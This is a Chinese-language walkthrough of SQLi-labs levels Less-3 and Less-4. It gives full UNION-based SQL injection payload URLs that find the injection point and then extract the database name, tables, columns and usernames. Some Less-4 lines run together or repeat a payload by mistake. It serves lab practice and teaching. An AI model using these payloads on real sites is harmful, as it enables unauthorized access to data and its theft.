Less-3
1.测试是否存在注入点:
http://sqli-labs/Less-3/?id=1'
可以看出是单引号+小括号闭合。
http://sqli-labs/Less-3/?id=1')--+
2 爆列数(回显位)
http://sqli-labs/Less-3/?id=') union select 1,2,3--+
3.爆库
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+
4.爆表
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
5.爆列
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
6.爆字段
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+
Less-4
1.测试是否存在注入点:
是双引号+小括号闭合
2 爆列数(回显位)
http://sqli-labs/Less-4/?id=") union select 1,2,3--+3.爆库
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+4.爆表
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
5.爆列
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+6.爆字段
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+
总结
前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。